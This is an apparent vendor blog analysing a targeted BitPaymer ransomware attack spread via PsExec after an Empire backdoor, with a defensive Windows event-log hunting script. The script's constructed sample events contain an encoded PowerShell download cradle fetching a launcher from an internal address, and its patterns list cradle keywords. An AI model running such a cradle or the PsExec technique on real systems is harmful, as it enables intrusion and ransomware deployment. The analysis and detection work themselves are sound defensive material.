Account With Admin Privileges Abused to Install BitPaymer Ransomware via PsExec
Ransomware may have experienced a decline in 2018, but it seems to be getting back on track — only this time, attacks are looking to be more targeted. Coming on the heels of news about a ransomware attack against a U.S. beverage company which addressed the company by name in the ransom note, this blog post looks into a BitPaymer ransomware variant (detected by Trend Micro as Ransom.Win32.BITPAYMER.TGACAJ) that hit a U.S. manufacturing company. As with the beverage company, this company, too, appears to have been targeted as its affected systems showed a ransom note with its name explicitly addressed.
Our investigation leads us to believe that an account with administrator privileges may have been compromised and used to install BitPaymer via PsExec, a Sysinternals command-line tool that executes processes on remote computers.
How BitPaymer Gained a Foothold Into the System
BitPaymer, which is related to the iEncrypt ransomware, was executed in the manufacturing company's environment using PsExec. Our analysis revealed that on February 18, 2019, between 9:40 p.m. and 11:03 p.m. PST, commands were sent via PsExec to copy and execute the BitPaymer variant.
Running commands through PsExec requires credentials for at least one account with administrator privileges on the target machines: PsExec authenticates to the target's ADMIN$ share, copies its service binary there, and registers and starts it as a service, so it needs the same rights a remote administrator would. This means a security breach, in which such an account was compromised, had already taken place before the ransomware was installed.
Data from the Trend Micro™ Smart Protection Network™ infrastructure supports this hypothesis. From January 29 to February 18, multiple attempts to run an Empire PowerShell backdoor on a number of machines were detected. Indicators show that this was done remotely and without dropping a file on the target machines. Binaries associated with Dridex, which we found to share loaders with BitPaymer, were also detected within the same period. Note that in the case of the U.S. beverage company, some researchers believe that an initial Dridex infection may be linked to the eventual ransomware infection.
Looking at all available information, we can then infer that a security breach had already taken place in the company before or on January 29.
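The two activities described above, PsExec lateral movement and fileless PowerShell launched remotely, leave a characteristic trail in Windows event logs even when no file is written to the target. The following hunting script is an added example, not Trend Micro's tooling or anything recovered from the incident: it correlates a network logon (Security event 4624, logon type 3) with a PsExec-style service installation (System event 7045) on the same host, and it decodes `-EncodedCommand` arguments in Sysmon process-creation events (event ID 1) to expose download cradles of the kind Empire launchers use. The event records, hostnames, usernames, IP address and encoded payload are all constructed for the example.

```python
"""Hunt for PsExec lateral movement and fileless (encoded) PowerShell in Windows event logs.

Added example for this write-up; not Trend Micro code and not data from the incident.
Events are flattened dicts in the shape of Security 4624, System 7045 and Sysmon ID 1.
"""
import base64
import re
from datetime import datetime, timedelta

# Constructed payload in the shape of an Empire launcher: a download cradle passed via -Enc.
# powershell.exe -EncodedCommand expects Base64 of the UTF-16LE script text.
_CRADLE = 'IEX (New-Object Net.WebClient).DownloadString("http://10.0.5.17/launcher")'
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16le")).decode("ascii")
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample events (hostnames, users and addresses are hypothetical).
SAMPLE_EVENTS = [
    {"log": "Security", "id": 4624, "time": "2019-02-18T21:40:02", "host": "WS-042",
     "logon_type": 3, "user": "CORP\\svc_admin", "src_ip": "10.0.5.17"},
    {"log": "System", "id": 7045, "time": "2019-02-18T21:40:03", "host": "WS-042",
     "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe"},
    {"log": "Sysmon", "id": 1, "time": "2019-02-18T21:40:04", "host": "WS-042",
     "image": "C:\\Windows\\PSEXESVC.exe", "parent_image": "C:\\Windows\\System32\\services.exe",
     "command_line": "C:\\Windows\\PSEXESVC.exe"},
    {"log": "Sysmon", "id": 1, "time": "2019-02-18T21:40:05", "host": "WS-042",
     "image": _PS, "parent_image": "C:\\Windows\\PSEXESVC.exe",
     "command_line": "powershell.exe -NoP -W Hidden -Enc " + _ENCODED},
    # Benign: a scheduled script run locally; must not be flagged.
    {"log": "Sysmon", "id": 1, "time": "2019-02-18T09:00:00", "host": "WS-042",
     "image": _PS, "parent_image": "C:\\Windows\\System32\\svchost.exe",
     "command_line": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

PSEXEC_SERVICE = re.compile(r"psexesvc", re.IGNORECASE)
# PsExec's -r switch renames the service, but the binary is still dropped into the root of
# %SystemRoot% through ADMIN$, so a new service whose binary lives directly there is the fallback.
SYSROOT_SERVICE_BINARY = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\[^\\]+\.exe$", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the common ones.
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})",
                         re.IGNORECASE)
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "frombase64string")
REMOTE_EXEC_PARENTS = ("psexesvc.exe", "wmiprvse.exe", "wsmprovhost.exe")


def _ts(s):
    return datetime.fromisoformat(s)


def is_psexec_service_install(event):
    """System 7045 whose service name or binary path looks like PsExec's service."""
    if event["log"] != "System" or event["id"] != 7045:
        return False
    name, path = event.get("service_name", ""), event.get("image_path", "")
    return bool(PSEXEC_SERVICE.search(name) or PSEXEC_SERVICE.search(path)
                or SYSROOT_SERVICE_BINARY.match(path))


def detect_psexec_lateral_movement(events, window=timedelta(seconds=60)):
    """Pair each PsExec-style service install with the network logon that preceded it."""
    logons = [e for e in events
              if e["log"] == "Security" and e["id"] == 4624 and e.get("logon_type") == 3]
    findings = []
    for svc in filter(is_psexec_service_install, events):
        t_svc = _ts(svc["time"])
        candidates = [l for l in logons if l["host"] == svc["host"]
                      and timedelta(0) <= t_svc - _ts(l["time"]) <= window]
        src = max(candidates, key=lambda l: _ts(l["time"]), default=None)  # newest logon wins
        findings.append({"host": svc["host"], "time": svc["time"],
                         "service": svc.get("service_name"),
                         "user": src["user"] if src else None,
                         "src_ip": src["src_ip"] if src else None})
    return findings


def decode_encoded_command(command_line):
    """Return the script text hidden behind -EncodedCommand, or None if absent/undecodable."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_fileless_powershell(events):
    """Flag powershell.exe launches that are encoded, remotely spawned, or carry a download cradle."""
    findings = []
    for e in events:
        if e["log"] != "Sysmon" or e["id"] != 1:
            continue
        if not e.get("image", "").lower().endswith("powershell.exe"):
            continue
        decoded = decode_encoded_command(e.get("command_line", ""))
        script = (decoded or e.get("command_line", "")).lower()
        parent = e.get("parent_image", "").lower().rsplit("\\", 1)[-1]
        reasons = []
        if parent in REMOTE_EXEC_PARENTS:
            reasons.append("spawned by remote-execution host " + parent)
        if decoded is not None:
            reasons.append("encoded command")
        markers = [m for m in CRADLE_MARKERS if m in script]
        if markers:
            reasons.append("download cradle: " + ", ".join(markers))
        if reasons:
            findings.append({"host": e["host"], "time": e["time"], "parent": parent,
                             "decoded": decoded, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_psexec_lateral_movement(SAMPLE_EVENTS) + detect_fileless_powershell(SAMPLE_EVENTS):
        print(f)
```

In a real environment the same logic runs over exported EVTX records or a SIEM query; the point is the correlation, since a lone 4624 type 3 logon by an administrator is normal, whereas one followed within seconds by a new service whose binary sits in the root of %SystemRoot% and then by an encoded PowerShell launch is the PsExec-plus-Empire sequence described above.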
This BitPaymer Variant Is Not New
As mentioned, Ransom.Win32.BITPAYMER.TGACAJ specifically addresses the name of the victim company in the ransom note and also uses it as the extension for the encrypted files. These features indicate that the company was likely targeted. A similar variant of Ransom.Win32.BITPAYMER.TGACAJ was seen in late 2018 when it targeted a number of companies, including a Germany-based manufacturing company. That variant also used the name of the victim company in the ransom note and as the extension for the encrypted files.
Figure 2. The ransom note instructs the victim to contact the threat actor(s) to learn how much must be paid for decryption. Notably, the key used in the encryption is stored in the note itself, not within the encrypted files, so losing the ransom note could eliminate any chance of decrypting the files.
Apart from the changes made to the ransom note and the file extension reflecting the victim companies’ names, there are no other differences between Ransom.Win32.BITPAYMER.TGACAJ and the variant reported in the latter part of 2018.
Code Comparison to Previous BitPaymer Variants
Our analysis shows that this BitPaymer ransomware variant is not new but merely a modified one in terms of the ransom note and the file extension it uses. The code structure of this variant has many similarities with previously spotted BitPaymer variants: it uses the same routine to resolve the Windows API functions it needs and the same entry point for the unpacked code. The screenshots below show how each variant resolves the API:
The Aftermath of the BitPaymer Execution
The effects of the ransomware infection were minimized on endpoints where a behavioral monitoring solution, along with other anti-ransomware technologies, was enabled. Behavioral monitoring helps detect new variants by checking for known malicious behaviors rather than relying on signatures. In this incident, it blocked the unwanted encryption and modification of files, and it also prevented the execution of the Empire backdoor.
However, the security gap that allowed the attacker to get as far as executing ransomware may still be unaddressed, and undetected components may still be running in the environment. In cases like this, countermeasures should be taken to avoid a repeat compromise from the same cause: reset the credentials of all accounts (administrator accounts in particular), follow best practices for preventing the abuse of sysadmin tools such as PsExec, and audit for the traces such tools leave, for example unexpected service installations (System event 7045) that coincide with remote administrator logons.
Date added: April 15, 2019, 4:55 p.m.